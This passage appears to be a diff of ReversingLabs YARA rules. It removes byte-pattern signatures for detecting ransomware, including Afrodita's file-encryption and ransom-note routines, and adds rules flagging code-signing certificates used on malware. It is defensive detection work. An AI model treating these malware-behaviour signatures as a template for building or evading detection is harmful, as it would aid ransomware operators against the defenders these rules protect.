C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 - 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB - ?? 83 C5 ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 87 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 - } - $enum_resources_p1 = { - 55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? - ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 - 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 EC ?? 85 C0 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 - ?? C9 C2 ?? ?? 8B 45 ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 EC ?? 85 C0 89 85 ?? ?? ?? ?? 74 ?? 90 8D B4 26 ?? ?? ?? ?? 8B 45 ?? C7 - 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 55 ?? - 89 54 24 ?? 8B 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 - 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 - 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? - 85 C0 0F 94 C0 0F B6 C0 89 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B - } - $enum_resources_p2 = { - 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 45 ?? EB ?? 8B 45 ?? 8B 40 ?? 89 85 - ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 83 45 ?? ?? 8B - 85 ?? ?? ?? ?? 39 45 ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 8D 45 ?? 8B 4D - ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? - 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 0F 84 - ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 8D 45 ?? 8B - 4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 8B 40 ?? 89 C2 89 85 ?? ?? ?? ?? 8D 45 - ?? 85 D2 89 45 ?? B8 ?? ?? ?? ?? 74 ?? 89 14 24 E8 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 89 - 44 24 ?? 8B 85 ?? ?? ?? ?? 8D 4D ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D - 45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D - 55 ?? 39 D0 0F 84 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 - } - $encrypt_files_p1 = { - 55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? - C6 45 ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 - 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 03 48 ?? 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 01 C7 04 24 ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 EC ?? C7 85 ?? ?? ?? ?? - ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 4D ?? 83 EC ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 8B 51 ?? 8D - 8D ?? ?? ?? ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? B8 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 8D 8D ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 03 48 ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 EC ?? 39 D0 - 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? - ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B - } - $encrypt_files_p2 = { - 40 ?? 89 44 24 ?? 8B 45 ?? 8B 00 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 - ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? A1 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C9 C3 03 48 ?? 8B 41 ?? 83 C8 ?? 89 04 24 C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? - ?? 03 48 ?? 8B 41 ?? 83 C8 ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 EC ?? E9 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C5 ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 77 ?? 8B 85 - ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 0F 0B 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 - ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 15 ?? ?? - ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 - } - $encrypt_files_p3 = { - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? - ?? ?? 8B 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 89 94 05 ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 - 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 55 89 E5 81 - EC ?? ?? ?? ?? 8D 45 ?? 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45 ?? 8B - 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? - 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 - } - $encrypt_files_p4 = { - D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 55 ?? 85 D2 75 ?? C6 45 ?? ?? 8D 45 ?? 89 04 24 - E8 ?? ?? ?? ?? 0F B6 45 ?? C9 C3 8D 45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D - ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 - EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 - 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8D 55 ?? 83 - EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8 - ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B - 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? - 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0 74 ?? - 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D ?? 89 45 - } - $encrypt_files_p5 = { - 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 - ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? - 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 8B 4D - ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? - ?? ?? 89 45 ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 - ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D - 45 ?? 8B 4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? - C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8D 45 ?? 89 04 24 - C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? - ?? ?? 8B 45 ?? 8D 4D ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? - ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 - } - $encrypt_files_p6 = { - 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 8B 00 - 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 89 85 ?? ?? ?? ?? 0F - 84 ?? ?? ?? ?? 8D 4D ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 3D ?? - ?? ?? ?? 77 ?? 83 E0 ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? - ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 EC ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 - ?? 89 04 24 E8 ?? ?? ?? ?? 8D 55 ?? C7 44 24 ?? ?? ?? ?? ?? 89 C1 89 54 24 ?? 8B 45 - ?? 89 44 24 ?? 89 8D ?? ?? ?? ?? 89 4C 24 ?? 8B 95 ?? ?? ?? ?? 89 14 24 C7 45 ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 EC ?? 3B 55 ?? 89 95 ?? ?? ?? ?? 0F 85 ?? ?? ?? - ?? 8B 45 ?? 8B 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C1 E8 ?? 89 8D ?? ?? ?? ?? 85 C0 - 89 85 ?? ?? ?? ?? 74 ?? 8B 45 ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 89 85 ?? - ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 45 ?? ?? 83 85 ?? ?? ?? ?? - ?? 8B 55 ?? 39 95 ?? ?? ?? ?? 75 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 - } - $encrypt_files_p7 = { - C7 44 24 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 4D ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 8B 8D ?? ?? ?? ?? 89 4C 24 - ?? 8B 95 ?? ?? ?? ?? 89 54 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 8D ?? - ?? ?? ?? 83 EC ?? 3B 4D ?? 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 - ?? ?? ?? ?? 51 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? - ?? ?? 89 14 24 E8 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? C6 45 ?? - ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 52 - 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 - ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 8B 00 89 04 24 C7 - 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 50 8D 4D ?? 8B 45 ?? 39 C8 74 ?? 89 04 24 E8 ?? - ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 89 45 ?? E9 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="0f:20:38:39:a9:c6:3b:87:98:a7:cb:31" and 1480923809<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Dc992Ea8E6Bb4926931Df656D5Eef8A0 : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "506b217e-ea82-5f14-880e-b6c0cbb001fb" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15608-L15626" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2b261624677a1c4a1ef539106bedcef30f272fda3d833d4c8095e9797d592e1f" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($enum_resources_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MEGAPOLISELIT, OOO" and (pe.signatures[i].serial=="00:dc:99:2e:a8:e6:bb:49:26:93:1d:f6:56:d5:ee:f8:a0" or pe.signatures[i].serial=="dc:99:2e:a8:e6:bb:49:26:93:1d:f6:56:d5:ee:f8:a0") and 1497916800<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Afrodita : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_41Bd49Bb456644D8183B3Dae72Ec8F22 : INFO FILE { meta: - description = "Yara rule that detects Afrodita ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "513963fd-5f3d-5d31-a65a-37f6f5c72260" - date = "2020-07-15" - modified = "2020-07-15" + id = "4645eeae-2aea-59aa-a6bf-095bb9d0d711" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Afrodita.yara#L1-L119" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ce7cc445d4c1f59c25b9505fc1f7f9dd0d286ab80510e2977b50ff15433aea60" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15628-L15644" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0516af7b27d244f21c9cea62fe599725d412e385e34f5f3f4f618d565365d321" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Afrodita" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $exclude_directories_and_drop_ransom_note = { - 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 8D ?? ?? - ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D 95 ?? - ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D - 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? - 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? - ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 - ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 75 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B - 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? - ?? ?? 89 8D ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8D 85 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A - ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D - 4D ?? E8 ?? ?? ?? ?? EB ?? B8 - } - $drop_ransom_note_no_dir_exclusion = { - 8D 95 ?? ?? ?? ?? 52 8B 43 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 - ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 95 ?? - ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 33 C0 88 85 ?? ?? ?? ?? 33 C9 88 8D ?? ?? - ?? ?? 33 D2 88 95 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 50 0F B6 8D ?? ?? ?? ?? 51 0F B6 - 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 E8 ?? ?? ?? ?? - 50 8B 4B ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? - 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? - 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 - ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B - 5D ?? B8 ?? ?? ?? ?? C3 C7 45 - } - $find_files_p1 = { - 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53 - 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? - 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ?? - 